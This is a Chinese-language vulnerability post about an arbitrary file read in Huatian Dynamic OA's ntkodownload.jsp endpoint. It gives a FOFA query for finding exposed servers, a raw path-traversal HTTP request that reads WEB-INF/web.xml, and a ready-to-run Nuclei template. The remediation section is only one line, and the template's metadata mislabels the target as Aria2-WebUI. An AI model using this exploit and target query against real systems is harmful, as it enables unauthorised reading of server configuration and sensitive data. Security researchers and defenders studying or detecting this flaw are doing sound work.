华天动力OA ntkodownload.jsp 任意文件读取漏洞

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

华天动力OA是一个以技术领先著称的协同软件产品，拥有领先业界的三大核心技术：协同平台、工作流和智能报表，是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品，也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。

华天动力OA ntkodownload.jsp接口处存在任意文件读取漏洞，恶意攻击者可能会利用此漏洞获取敏感信息，造成信息泄露

Ⅱ、fofa语句

app="华天动力-OA8000"

Ⅲ、漏洞复现

POC

POST /OAapp/jsp/trace/ntkodownload.jsp?filename=../../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

1、构建poc

Ⅳ、Nuclei-POC

id: Hutian-OA-ntkodownload-jsp-any-read

info:
  name:  华天动力OA ntkodownload.jsp接口处存在任意文件读取漏洞，恶意攻击者可能会利用此漏洞获取敏感信息，造成信息泄露
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="Aria2-WebUI"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /OAapp/jsp/trace/ntkodownload.jsp?filename=../../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Connection: close


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"web-app")

Ⅴ、修复建议

在安全设备上设置访问控制策略